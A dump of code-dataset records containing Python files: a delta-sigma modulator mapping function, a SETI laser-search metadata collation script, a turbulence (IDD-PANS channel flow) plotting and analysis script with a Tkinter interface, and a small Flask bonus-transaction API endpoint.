ds_quantize\r\nfrom ._sgn import sgn\r\nimport numpy as np\r\n\r\ndef dsmap(u:np.ndarray, ABCD:np.ndarray, nlev:int, x:np.ndarray, e:np.ndarray, v=None)->np.ndarray:\r\n \"\"\"function nx = dsmap(u,ABCD,nlev,x,e,v)\r\n\r\n For a DSM with input u, a structure ABCD and an nlev-level quantizer,\r\n compute the (potential) vertices of the image of a convex object \r\n described in terms of its vertices (x) and edges (e).\r\n If u has two elements, it is considered to represent a range.\r\n v is the assumed quantizer output; it is computed if it is not supplied.\r\n\r\n Basic Algorithm:\r\n 1) Compute the images of the vertices.\r\n 2) For those edges which cross a splitting hyperplane,\r\n compute the images of each split point.\r\n 3) For u-ranges, append the translated images to the list.\r\n\r\n \"\"\"\r\n\r\n n = np.shape(ABCD)[0] - 1\r\n A = ABCD[0:n, 0:n]\r\n B = ABCD[0:n, n:n+2]\r\n C = ABCD[n, 0:n]\r\n D = ABCD[n, n]\r\n\r\n N = np.shape(x)[1]\r\n if np.max(np.shape(u)) == 2:\r\n u2 = u[1]\r\n u = u[0]\r\n isRange = True\r\n if D1 != 0:\r\n print(\"Limitation: D1 must be zero.\")\r\n return\r\n \r\n elif np.max(np.shape(u)) == 1:\r\n isRange = False\r\n \r\n else:\r\n print(\"Error. The dimensions of u are wrong.\")\r\n return\r\n\r\n \r\n # Compute v. The assumption that D1 = 0 for u-ranges is implicit in this step.\r\n if v == None:\r\n y = C*x + D1*u\r\n v = ds_quantize(y, nlev)\r\n elif np.max(np.shape(v)) != N:\r\n v = np.tile(v[0], (1, N))\r\n else:\r\n print(\"error: the supplied v argument is the wrong size.\")\r\n return\r\n\r\n # 1) Compute the images of the vertices\r\n B1u = B[:, 1] * u\r\n nx = A*x + np.tile(B1u[:, 0], (1, N)) + B[:, 1]*v\r\n\r\n # 2) For those edges which cross a (or several) splitting hyperplanes,\r\n # compute the two images of each split point\r\n diff = np.abs(v[e[0, :]] - v[e[1, :]])\r\n split1 = (diff == 2) # edges split in one place only\r\n\r\n # Handle the split1 edges en masse.\r\n if split1.any() == True:\r\n i1 = e[0, np.nonzero(split1)]\r\n i2 = e[1, np.nonzero(split1)]\r\n y0 = 0.5*(v[i1]+v[i2]) # The approproate quantizer thresholds\r\n k1 = (y[i2]-y0)/(y[i2]-y[i1])\r\n k2 = 1 - k1\r\n psplit = np.tile(k1[0, :], (n, 1))*x[:, i1] + np.tile(k2[0, :], (n, 1))*x[:, i2]\r\n N = np.max(np.shape(k1))\r\n images1 = A*psplit + np.tile(B1u[:, 0], (1, N)) + B[:, 1]*v[i1]\r\n images2 = images1 + B[:, 1]*(v[i2] - v[i1])\r\n nx = np.hstack([nx, images1, images2])\r\n\r\n \r\n # Treat the multiply-split edges as a special case.\r\n split2 = np.where(diff > 2)\r\n for i in split2:\r\n i1 = e[0, i]\r\n i2 = e[1, i]\r\n v1 = v[i1]\r\n v2 = v[i2]\r\n x1 = x[:, i1]\r\n x2 = x[:, i2]\r\n y1 = y[i1]\r\n y2 = y[i2]\r\n dv = v2 - v1\r\n N = np.abs(dv/2)\r\n y0 = v1 + sgn(dv) # The first quantizer threshold crossed\r\n k1 = (y2-y0)/(y2-y1)\r\n k2 = 1 - k1\r\n x0 = k1*x1 + k2*x2 # The first split point\r\n image0 = A*x0 + B1u + B[:, 1]*v1 # Its image\r\n deltaB = B[:, 1]*(2*dv) # The image shift due to splitting\r\n A_deltax = A*((x2-x1)/(0.5*(y2-y1))) # The image shift due to x\r\n images = np.tile(image0[:, 0], (1, N)) + A_deltax*np.arange(0, N, 1)\r\n images = np.hstack([images, images+np.tile(deltaB[:, 0], (1, N))])\r\n\r\n \r\n # 3) For u-ranges, append the translated images to the list\r\n if isRange == True:\r\n translation = (u2-u)*ABCD[0:n, n]\r\n nx = np.hstack([nx, nx+np.tile(translation[:, 0], (1, np.shape(nx)[1]))])\r\n \r\n return nx","sub_path":"deltasigma/beta/PosInvSet/_dsmap.py","file_name":"_dsmap.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"271215910","text":"import spectroseti.apf as apf\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.io import fits\nimport seaborn as sb\nimport spectroseti.apf as apf\nimport spectroseti.apfdefinitions as apfdefs\nfrom os import listdir, mkdir\nimport spectroseti.utilities as util\nimport csv\nimport scipy.signal as sg\nimport pickle\n\nimport pandas as pd\nfrom xarray import Dataset\n\n\nrun_name = 'bkjRunJun16'\nfolder_name = apfdefs.laser_search_run_dir + run_name + '/'\n\nall_reduced = listdir(folder_name)\nfiles_to_collate = [fn for fn in all_reduced if fn[-2:] == '.p']\n\n\nd = dict()\nall_devs = []\nfor f in files_to_collate:\n pickle_off = open(folder_name+f, \"rb\")\n emp = pickle.load(pickle_off)\n name = f[1:8]\n flat_dict = dict()\n flat_dict.update(emp['meta'])\n devs = emp['devs']\n meta = emp['meta']\n order_medians = emp['order_medians']\n color_index = order_medians[61]/order_medians[21]\n # devs_list = []\n run = meta['run']\n obs = meta['obs']\n for dev in devs:\n counts_per_mad = dev['dev'][4]\n all_devs.append(\n {\n 'run': run,\n 'obs': obs,\n 'cosmic_reject_value': dev['cosmic_reject_value'],\n 'order': dev['dev'][0],\n 'num_pixels': dev['dev'][1],\n 'start_pixel': dev['dev'][2],\n 'continuum_val': dev['dev'][3],\n 'MAD': dev['dev'][4],\n 'threshold': dev['dev'][3] + dev['dev'][4] * meta['number_mads'],\n 'peak_pixel_value': (dev['dev'][8] - dev['dev'][3])/counts_per_mad,\n 'mean_deviant_pixel_value': (dev['dev'][5] - dev['dev'][3])/counts_per_mad,\n 'median_deviant_pixel_value': (dev['dev'][6] - dev['dev'][3])/counts_per_mad,\n 'central_wav': dev['dev'][7],\n 'intensity': (dev['dev'][5] - dev['dev'][3]) * dev['dev'][1] / counts_per_mad,\n 'color_index': color_index,\n 'target_name': meta['target_name'],\n 'exposure_time': meta['exposure_time'],\n 'RA': meta['RA'],\n 'DEC': meta['DEC'],\n 'HA': meta['HA'],\n 'AZ': meta['AZ'],\n 'reduced_filename': 'r%(run)s.%(obs)s.fits' % locals(),\n 'raw_filename': 'ucb-%(run)s%(obs)s.fits' % locals()\n }\n )\n # Now we should make a .csv of all of these data\n keys = ['run',\n 'obs',\n 'cosmic_reject_value',\n 'order',\n 'num_pixels',\n 'start_pixel',\n 'continuum_val',\n 'MAD',\n 'threshold',\n 'peak_pixel_value',\n 'mean_deviant_pixel_value',\n 'median_deviant_pixel_value',\n 'central_wav',\n 'intensity',\n 'color_index',\n 'target_name',\n 'exposure_time',\n 'RA',\n 'DEC',\n 'HA',\n 'AZ',\n 'reduced_filename',\n 'raw_filename']\n filename = apfdefs.laser_search_run_dir + '/' + run_name +'_metadata.csv'\n with open(filename, 'wb') as output_file:\n writer = csv.DictWriter(\n output_file, fieldnames=keys)\n writer.writeheader()\n writer.writerows(all_devs)\n output_file.close()\n\n # flat_dict['devs'] = pd.DataFrame(devs_list)\n # flat_dict['order_meta'] = pd.DataFrame(map(\n # lambda x, y, i: {'order': i, 'order_median': x, 'percentile': y[0], 'threshold': y[1]},\n # emp['order_medians'],\n # emp['percentiles_and_thresholds'],\n # range(len(emp['order_medians']))\n # ))\n # d[name] = flat_dict\n\n\n\n# This needs to be massaged into a workable format. The above code is a good scaffold on which to do this.\n","sub_path":"scripts/collate_metadata.py","file_name":"collate_metadata.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"354977929","text":"import scipy.io as sio\nimport numpy as np\nimport tkinter as tk\nimport sys\nimport matplotlib.pyplot as plt\nplt.rcParams.update({'font.size': 22})\n\nplt.interactive(True)\n\n\ndx=0.05\ndz=0.025\n\nni=34\nnj=49\nnk=34\n\n\nviscos=1./5200.\n\n#---- read v_1 & transform v_1 to a 3D array (file 1)\nuvw = sio.loadmat('u1_IDD_PANS.mat')\nttu=uvw['u1_IDD_PANS']\nu3d1= np.reshape(ttu,(nk,nj,ni))\n# N.B.- We don't have to swich axex since python and fortran stores an array in the same way\n\nuvw = sio.loadmat('v1_IDD_PANS.mat')\ntt=uvw['v1_IDD_PANS']\nv3d1= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('w1_IDD_PANS.mat')\ntt=uvw['w1_IDD_PANS']\nw3d1= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('te1_IDD_PANS.mat')\ntt=uvw['te1_IDD_PANS']\nte3d1= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('eps1_IDD_PANS.mat')\ntt=uvw['eps1_IDD_PANS']\neps3d1= np.reshape(tt,(nk,nj,ni))\n\n\n#---- read v_2 & transform v_2 to a 3D array (file 2)\nuvw = sio.loadmat('u2_IDD_PANS.mat')\nttu=uvw['u2_IDD_PANS']\nu3d2= np.reshape(ttu,(nk,nj,ni))\n# N.B.- We don't have to swich axex since python and fortran stores an array in the same way\n\nuvw = sio.loadmat('v2_IDD_PANS.mat')\ntt=uvw['v2_IDD_PANS']\nv3d2= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('w2_IDD_PANS.mat')\ntt=uvw['w2_IDD_PANS']\nw3d2= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('te2_IDD_PANS.mat')\ntt=uvw['te2_IDD_PANS']\nte3d2= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('eps2_IDD_PANS.mat')\ntt=uvw['eps2_IDD_PANS']\neps3d2= np.reshape(tt,(nk,nj,ni))\n\n#---- read v_3 & transform v_3 to a 3D array (file 3)\nuvw = sio.loadmat('u3_IDD_PANS.mat')\nttu=uvw['u3_IDD_PANS']\nu3d3= np.reshape(ttu,(nk,nj,ni))\n# N.B.- We don't have to swich axex since python and fortran stores an array in the same way\n\nuvw = sio.loadmat('v3_IDD_PANS.mat')\ntt=uvw['v3_IDD_PANS']\nv3d3= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('w3_IDD_PANS.mat')\ntt=uvw['w3_IDD_PANS']\nw3d3= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('te3_IDD_PANS.mat')\ntt=uvw['te3_IDD_PANS']\nte3d3= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('eps3_IDD_PANS.mat')\ntt=uvw['eps3_IDD_PANS']\neps3d3= np.reshape(tt,(nk,nj,ni))\n\n\n#---- read v_4 & transform v_4 to a 3D array (file 4)\nuvw = sio.loadmat('u4_IDD_PANS.mat')\nttu=uvw['u4_IDD_PANS']\nu3d4= np.reshape(ttu,(nk,nj,ni))\n# N.B.- We don't have to swich axex since python and fortran stores an array in the same way\n\nuvw = sio.loadmat('v4_IDD_PANS.mat')\ntt=uvw['v4_IDD_PANS']\nv3d4= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('w4_IDD_PANS.mat')\ntt=uvw['w4_IDD_PANS']\nw3d4= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('te4_IDD_PANS.mat')\ntt=uvw['te4_IDD_PANS']\nte3d4= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('eps4_IDD_PANS.mat')\ntt=uvw['eps4_IDD_PANS']\neps3d4= np.reshape(tt,(nk,nj,ni))\n\n\n#---- read v_5 & transform v_5 to a 3D array (file 5)\nuvw = sio.loadmat('u5_IDD_PANS.mat')\nttu=uvw['u5_IDD_PANS']\nu3d5= np.reshape(ttu,(nk,nj,ni))\n# N.B.- We don't have to swich axex since python and fortran stores an array in the same way\n\nuvw = sio.loadmat('v5_IDD_PANS.mat')\ntt=uvw['v5_IDD_PANS']\nv3d5= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('w5_IDD_PANS.mat')\ntt=uvw['w5_IDD_PANS']\nw3d5= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('te5_IDD_PANS.mat')\ntt=uvw['te5_IDD_PANS']\nte3d5= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('eps5_IDD_PANS.mat')\ntt=uvw['eps5_IDD_PANS']\neps3d5= np.reshape(tt,(nk,nj,ni))\n\n\n#---- read v_6 & transform v_6 to a 3D array (file 6)\nuvw = sio.loadmat('u6_IDD_PANS.mat')\nttu=uvw['u6_IDD_PANS']\nu3d6= np.reshape(ttu,(nk,nj,ni))\n# N.B.- We don't have to swich axex since python and fortran stores an array in the same way\n\nuvw = sio.loadmat('v6_IDD_PANS.mat')\ntt=uvw['v6_IDD_PANS']\nv3d6= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('w6_IDD_PANS.mat')\ntt=uvw['w6_IDD_PANS']\nw3d6= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('te6_IDD_PANS.mat')\ntt=uvw['te6_IDD_PANS']\nte3d6= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('eps6_IDD_PANS.mat')\ntt=uvw['eps6_IDD_PANS']\neps3d6= np.reshape(tt,(nk,nj,ni))\n\n\n#---- read v_7 & transform v_7 to a 3D array (file 7)\nuvw = sio.loadmat('u7_IDD_PANS.mat')\nttu=uvw['u7_IDD_PANS']\nu3d7= np.reshape(ttu,(nk,nj,ni))\n# N.B.- We don't have to swich axex since python and fortran stores an array in the same way\n\nuvw = sio.loadmat('v7_IDD_PANS.mat')\ntt=uvw['v7_IDD_PANS']\nv3d7= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('w7_IDD_PANS.mat')\ntt=uvw['w7_IDD_PANS']\nw3d7= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('te7_IDD_PANS.mat')\ntt=uvw['te7_IDD_PANS']\nte3d7= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('eps7_IDD_PANS.mat')\ntt=uvw['eps7_IDD_PANS']\neps3d7= np.reshape(tt,(nk,nj,ni))\n\n\n#---- read v_8 & transform v_8 to a 3D array (file 8)\nuvw = sio.loadmat('u8_IDD_PANS.mat')\nttu=uvw['u8_IDD_PANS']\nu3d8= np.reshape(ttu,(nk,nj,ni))\n# N.B.- We don't have to swich axex since python and fortran stores an array in the same way\n\nuvw = sio.loadmat('v8_IDD_PANS.mat')\ntt=uvw['v8_IDD_PANS']\nv3d8= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('w8_IDD_PANS.mat')\ntt=uvw['w8_IDD_PANS']\nw3d8= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('te8_IDD_PANS.mat')\ntt=uvw['te8_IDD_PANS']\nte3d8= np.reshape(tt,(nk,nj,ni))\n\nuvw = sio.loadmat('eps8_IDD_PANS.mat')\ntt=uvw['eps8_IDD_PANS']\neps3d8= np.reshape(tt,(nk,nj,ni))\n\n\n# merge 2 files. This means that new ni = 2*ni\nu3d=np.concatenate((u3d1, u3d2, u3d3, u3d4, u3d5, u3d6, u3d7, u3d8), axis=0)\nv3d=np.concatenate((v3d1, v3d2, v3d3, v3d4, v3d5, v3d6, v3d7, v3d8), axis=0)\nw3d=np.concatenate((w3d1, w3d2, w3d3, w3d4, w3d5, w3d6, w3d7, w3d8), axis=0)\nte3d=np.concatenate((te3d1, te3d2, te3d3, te3d4, te3d5, te3d6, te3d7, te3d8), axis=0)\neps3d=np.concatenate((eps3d1, eps3d2, eps3d3, eps3d4, eps3d5, eps3d6, eps3d7, eps3d8), axis=0)\n\n\n# x coordinate direction = index 0, first index\n# y coordinate direction = index 1, second index\n# z coordinate direction = index 2, third index\n\n\n\nni=len(u3d)\n\nx=dx*ni\nz=dz*nk\n\n\numean=np.mean(u3d, axis=(0,2))\nvmean=np.mean(v3d, axis=(0,2))\nwmean=np.mean(w3d, axis=(0,2))\ntemean=np.mean(te3d, axis=(0,2))\nepsmean=np.mean(eps3d, axis=(0,2))\n\n# face coordinates\nyc = np.loadtxt(\"yc.dat\")\n\n# cell cener coordinates\ny= np.zeros(nj)\ndy=np.zeros(nj)\nfor j in range (1,nj-1):\n# dy = cell width\n dy[j]=yc[j]-yc[j-1]\n y[j]=0.5*(yc[j]+yc[j-1])\n\ny[nj-1]=yc[nj-1]\ntauw=viscos*umean[1]/y[1]\nustar=tauw**0.5\nyplus=y*ustar/viscos\n\nDNS=np.genfromtxt(\"LM_Channel_5200_mean_prof.dat\", dtype=None,comments=\"%\")\ny_DNS=DNS[:,0]\nyplus_DNS=DNS[:,1]\nu_DNS=DNS[:,2]\nw_DNS=DNS[:,4]\n\nDNS=np.genfromtxt(\"LM_Channel_5200_vel_fluc_prof.dat\", dtype=None,comments=\"%\")\n\nu2_DNS=DNS[:,2]\nv2_DNS=DNS[:,3]\nw2_DNS=DNS[:,4]\nuv_DNS=DNS[:,5]\n\nk_DNS=0.5*(u2_DNS+v2_DNS+w2_DNS)\n\n# find equi.distant DNS cells in log-scale\nxx=0.\njDNS=[1]*40\nfor i in range (0,40):\n i1 = (np.abs(10.**xx-yplus_DNS)).argmin()\n jDNS[i]=int(i1)\n xx=xx+0.2\n \n# ---- Plot\n\n# ---- U2\ndef plot_mean_velocity_profile_u():\n fig1,ax1 = plt.subplots()\n plt.subplots_adjust(left=0.20,bottom=0.20)\n \n plt.semilogx(yplus,umean/ustar,'b-')\n plt.semilogx(yplus_DNS[jDNS],u_DNS[jDNS],'bo')\n plt.axis([1, 8000, 0, 31])\n plt.ylabel(\"$U^+$\")\n plt.xlabel(\"$y^+$\")\n\ndef plot_mean_velocity_profile_w():\n fig2,ax2 = plt.subplots()\n plt.subplots_adjust(left=0.20,bottom=0.20)\n \n plt.semilogx(yplus,wmean/ustar,'b-')\n plt.semilogx(yplus_DNS[jDNS],w_DNS[jDNS],'bo')\n plt.axis([1, 8000, 0, 1])\n plt.ylabel(\"$W^+$\")\n plt.xlabel(\"$y^+$\")\n\n# ---- U3\n \nuvmean1= np.mean((u3d-umean[None,:,None])*(v3d-vmean[None,:,None]), axis=(0,2))\nuumean = np.mean((u3d-umean[None,:,None])*(u3d-umean[None,:,None]), axis=(0,2))\nvvmean = np.mean((v3d-vmean[None,:,None])*(v3d-vmean[None,:,None]), axis=(0,2))\nwwmean = np.mean((w3d-wmean[None,:,None])*(w3d-wmean[None,:,None]), axis=(0,2))\n\nte_resolved = 0.5*(uumean + vvmean + wwmean)\n\ndef uv_stress_resolved():\n plt.figure(\"uv_Stress_resolved\")\n plt.plot(yplus, uvmean1)\n plt.title('Resolved uv Stress')\n plt.ylabel(\"$\\\\langle u^\\prime v^\\prime \\\\rangle$\")\n plt.xlabel(\"$y^+$\")\n\n# ---- U4\ndef te_plot():\n plt.figure(\"Turbulent Kinetic Energy\")\n plt.plot(yplus, temean, label='$k_{modelled}$')\n plt.plot(yplus, te_resolved, label='$k_{resolved}$')\n plt.plot(yplus, te_resolved + temean, label='$k_{tot}$')\n plt.title('Turbulent Kinetic Energy')\n plt.ylabel(\"$k$\")\n plt.xlabel(\"$y^+$\")\n plt.legend()\n\nline08 = np.ones(np.size(yplus))\nline_boundary = np.ones(np.size(yplus))\ndef te_plot_ratio():\n plt.figure(\"Turbulent Kinetic Energy ratio\")\n plt.plot(yplus, te_resolved/(te_resolved + temean), 'k-', label = '$\\\\frac{k_{res}}{k_{tot}}$')\n plt.plot(270*line_boundary, np.linspace(0,1, np.size(temean)), 'r-', label = 'Boundary')\n plt.plot(yplus, 0.8*line08, 'g-', label = '0.8 limit')\n plt.title('Turbulent kinetic energy resolved ratio')\n plt.ylabel(\"$Ratio$\")\n plt.xlabel(\"$y^+$\")\n plt.legend()\n \n# ---- U5\nCmu = 0.09\n\nnu_t = Cmu*np.divide(np.multiply(temean, temean), epsmean)\n \ndudx, dudy, dudz=np.gradient(u3d,dx,y,dz)\n\ndvdx, dvdy, dvdz=np.gradient(v3d,dx,y,dz)\n\ndwdx, dwdy, dwdz=np.gradient(w3d,dx,y,dz)\n\n# Time average\n\ndudymean = np.mean(dudy, axis=(0,2))\ndvdxmean = np.mean(dvdx, axis=(0,2))\n\ntau12 = - np.multiply(nu_t, dudymean + dvdxmean)\n\ndef turbulent_shear():\n plt.figure(\"Turbulent Shear\")\n plt.plot(yplus, tau12, label='$\\\\tau_{12}$')\n plt.plot(yplus, uvmean1, label='$\\\\tau_{resolved}$')\n plt.title('Turbulent Shear Ratio')\n plt.ylabel(\"$\\\\tau$\")\n plt.xlabel(\"$y^+$\")\n plt.legend()\n\ndef turbulent_shear_ratio():\n plt.figure(\"Turbulent Shear Ratio\")\n plt.plot(yplus, uvmean1/(tau12 + uvmean1), label='$\\\\frac{\\\\tau_{res}}{\\\\tau_{tot}}$')\n plt.plot(yplus, 0.8*line08, label = '0.8 limit')\n plt.plot(270*line_boundary, np.linspace(0,1, np.size(temean)), 'r-', label = 'Boundary')\n plt.title('Turbulent Shear Ratio')\n plt.ylabel(\"$\\\\tau$ Ratio\")\n plt.xlabel(\"$y^+$\")\n plt.legend()\n \n# ---- U6\nomega = eps3d/(Cmu*te3d)\nomega_mean = epsmean/(Cmu*temean)\nL_t = np.power(temean, 1.5)/epsmean\nL_t = np.sqrt(temean)/(Cmu*omega_mean)\n\nF_DES = (L_t/(0.61*dx))\n\narg1 = 2*np.divide(L_t, y)\narg2 = 500*viscos*Cmu*temean/(epsmean*np.power(y, 2))\neta = np.maximum(arg1, arg2)\nF_S = np.tanh(np.power(eta,2))\nF_DDES = (1/(0.61*dx))*np.multiply(L_t, 1 - F_S)\n\ndef boundary_interface_DES():\n plt.figure(\"DES\")\n plt.plot(yplus, F_DES, label = '$F_{DES}$')\n plt.plot(yplus, np.ones(np.size(yplus)), 'k-', label = 'boundary limit')\n plt.title('$F_{DES}$')\n plt.ylabel(\"f\")\n plt.xlabel(\"$y^+$\")\n plt.legend()\n\n\ndef boundary_interface_DDES():\n plt.figure(\"DDES\")\n plt.plot(yplus, F_DDES, label = '$F_{DDES}$')\n plt.plot(yplus, np.ones(np.size(yplus)), 'k-', label = 'boundary limit')\n plt.title('$F_{DDES}$')\n plt.ylabel(\"f\")\n plt.xlabel(\"$y^+$\")\n plt.legend()\n\n# ---- U7\n\nkappa = 0.41\n\nzeta = 1\n\n# 1D\n\ndumeandy = np.gradient(umean, y)\ndumeandy2 = np.gradient(dumeandy, y)\n\nL_v_K_1D = kappa * np.abs(dumeandy/dumeandy2)\n\n# 3D\n\n# u\ndudx2, dudxdy, dudxdz = np.gradient(dudx,dx,y,dz)\n\ndudydx, dudy2, dudydz = np.gradient(dudy,dx,y,dz)\n\ndudzdx, dudzdy, dudz2 = np.gradient(dudz,dx,y,dz)\n# v\ndvdx2, dvdxdy, dvdxdz = np.gradient(dvdx,dx,y,dz)\n\ndvdydx, dvdy2, dvdydz = np.gradient(dvdy,dx,y,dz)\n\ndvdzdx, dvdzdy, dvdz2 = np.gradient(dvdz,dx,y,dz)\n# w\ndwdx2, dwdxdy, dwdxdz = np.gradient(dwdx,dx,y,dz)\n\ndwdydx, dwdy2, dwdydz = np.gradient(dwdy,dx,y,dz)\n\ndwdzdx, dwdzdy, dwdz2 = np.gradient(dwdz,dx,y,dz)\n\n# L calc.\n\ns11=dudx\ns12=0.5*(dudy+dvdx)\ns13=0.5*(dudz+dwdx)\ns21=s12\ns22=dvdy\ns23=0.5*(dvdz+dwdy)\ns31=s13\ns32=s23\ns33=dwdz\n\nss=(2*(s11**2+s12**2+s13**2+s21**2+s22**2+s23**2+s31**2+s32**2+s33**2)**0.5)\n \ntermu=(dudx2+dudy2+dudz2)**2\ntermv=(dvdx2+dvdy2+dvdz2)**2\ntermw=(dwdx2+dwdy2+dwdz2)**2\n\nubis=(termu+termv+termw)**0.5\n\nL_v_K_3D = kappa*ss/ubis\n\n# L calc. alternative\n\ntermu_alt=dudx2**2+dudy2**2+2*dudxdy**2\ntermv_alt=dvdx2**2+dvdy2**2+2*dvdxdy**2\ntermw_alt=dwdx2**2+dwdy2**2+2*dwdxdy**2\n\nubis_alt=(termu_alt+termv_alt+termw_alt)**0.5\n\nL_v_K_3D_alt = kappa*ss/ubis_alt\n\n# Plot\nL_v_K_3D_mean = np.mean(L_v_K_3D , axis=(0,2))\nL_v_K_3D_mean_alt = np.mean(L_v_K_3D_alt , axis=(0,2))\n\ndef length_scale_compare():\n plt.figure(\"Comparison of Length Scales\")\n plt.plot(yplus, L_v_K_1D , label='1D')\n plt.plot(yplus, L_v_K_3D_mean , label='3D')\n plt.plot(yplus, L_v_K_3D_mean_alt , label='3D Alternative')\n plt.title('Comparison of Length Scales')\n plt.axis([0, 5200, 0, 0.85])\n plt.ylabel(\"Von Kármán Length Scale\")\n plt.xlabel(\"$y^+$\")\n plt.legend()\n\n# T1\n\n# 1D\n\nL = (te3d**0.5)/(omega*Cmu**0.25)\nLmean = np.mean(L , axis=(0,2))\n\nT_1_1D = zeta*kappa*(dumeandy**2)*(Lmean/L_v_K_1D)\n# 3D\nT_1_3D = zeta*kappa*(ss**2)*(L/L_v_K_3D)\n# 3D alt\nT_1_3D_alt = zeta*kappa*(ss**2)*(L/L_v_K_3D_alt)\n\nT_1_3D_mean = np.mean(T_1_3D, axis=(0,2))\nT_1_3D_alt_mean = np.mean(T_1_3D_alt, axis=(0,2))\n\ndef time_scale_compare():\n plt.figure(\"Comparison of $T_1$ Scales\")\n plt.plot(yplus, T_1_1D , label='1D')\n plt.plot(yplus, T_1_3D_mean , label='3D')\n plt.plot(yplus, T_1_3D_alt_mean , label='3D Alternative')\n plt.title('Comparison of $T_1$')\n plt.axis([0, 5200, 0, 5000])\n plt.ylabel(\"$T_1$\")\n plt.xlabel(\"$y^+$\")\n plt.legend()\n\n# ---- GUI Append\n\ndef close_fig():\n plt.close()\n \nroot = tk.Tk()\nclose_button = tk.Button(root, text='Close plot', command = close_fig)\nclose_button.grid(row=0, column=0)\n\n\n## Overview Plots\n# U2\nlabel_overview = tk.Label(text=\"U2\", background=\"grey\")\nlabel_overview.grid(row=0, column=1, sticky='nesw')\n\nbutton_mean_velocity_profile_vx = tk.Button(root, text= 'Mean velocity Profile v_1', command = plot_mean_velocity_profile_u)\nbutton_mean_velocity_profile_vx.grid(row=1, column=1, sticky='nesw')\n\nbutton_mean_velocity_profile_vz = tk.Button(root, text= 'Mean velocity Profile v_3', command = plot_mean_velocity_profile_w)\nbutton_mean_velocity_profile_vz.grid(row=2, column=1, sticky='nesw')\n\n# U3\nlabel_overview = tk.Label(text=\"U3\", background=\"grey\")\nlabel_overview.grid(row=0, column=2, sticky='nesw')\n\nbutton_uv = tk.Button(root, text= 'uv Resolved', command = uv_stress_resolved)\nbutton_uv.grid(row=1, column=2, sticky='nesw')\n\n# U4\nlabel_overview = tk.Label(text=\"U4\", background=\"grey\")\nlabel_overview.grid(row=0, column=3, sticky='nesw')\n\nbutton_te = tk.Button(root, text= 'Resolved tubulent Kinetic Energy', command = te_plot)\nbutton_te.grid(row=1, column=3, sticky='nesw')\n\nbutton_te_ratio = tk.Button(root, text= 'Tubulent Kinetic Energy resolved ratio', command = te_plot_ratio)\nbutton_te_ratio.grid(row=2, column=3, sticky='nesw')\n\n# U5\nlabel_overview = tk.Label(text=\"U5\", background=\"grey\")\nlabel_overview.grid(row=0, column=4, sticky='nesw')\n\nbutton_turbulent_shear = tk.Button(root, text= 'Turbulent Shear', command = turbulent_shear)\nbutton_turbulent_shear.grid(row=1, column=4, sticky='nesw')\n\nbutton_turbulent_shear_ratio = tk.Button(root, text= 'Turbulent Shear Ratio', command = turbulent_shear_ratio)\nbutton_turbulent_shear_ratio.grid(row=2, column=4, sticky='nesw')\n\n# U6\nlabel_overview = tk.Label(text=\"U6\", background=\"grey\")\nlabel_overview.grid(row=0, column=5, sticky='nesw')\n\nbutton_boundary_interface_DES = tk.Button(root, text= 'Boundary Interface DES', command = boundary_interface_DES)\nbutton_boundary_interface_DES.grid(row=1, column=5, sticky='nesw')\n\nbutton_boundary_interface_DDES = tk.Button(root, text= 'Boundary Interface DDES', command = boundary_interface_DDES)\nbutton_boundary_interface_DDES.grid(row=2, column=5, sticky='nesw')\n\n# U7\nlabel_overview = tk.Label(text=\"U7\", background=\"grey\")\nlabel_overview.grid(row=0, column=6, sticky='nesw')\n\nbutton_length_scale_compare = tk.Button(root, text= 'Length_scale_compare', command = length_scale_compare)\nbutton_length_scale_compare.grid(row=1, column=6, sticky='nesw')\n\nbutton_time_scale_compare = tk.Button(root, text= 'T_1_scale_compare', command = time_scale_compare)\nbutton_time_scale_compare.grid(row=2, column=6, sticky='nesw')\n\nroot.mainloop()\n\n","sub_path":"Assignment 2a/pl_uvw_IDD_PANS.py","file_name":"pl_uvw_IDD_PANS.py","file_ext":"py","file_size_in_byte":15915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"606516489","text":"from flask import Blueprint, jsonify, request\nfrom flask_jwt import jwt_required\n\nfrom bonuses.database import BonusTransaction, create_bonus_transaction\nfrom bonuses.utils import parse_iso8601_date\n\n\napi = Blueprint('third_party_api', __name__)\n\n\n@api.route('/bonus-transactions/', methods=['POST'])\n@jwt_required()\ndef add_user_bonus_transaction():\n created_id = create_bonus_transaction(BonusTransaction(\n id=None,\n bonus_card_id=request.json['bonus_card_id'],\n points=int(request.json['points']),\n flight_from=request.json['flight_from'],\n flight_to=request.json['flight_to'],\n flight_date=parse_iso8601_date(request.json['flight_date']),\n ))\n return jsonify({'success': True, 'id': created_id})\n","sub_path":"bonuses/api/third_party.py","file_name":"third_party.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} 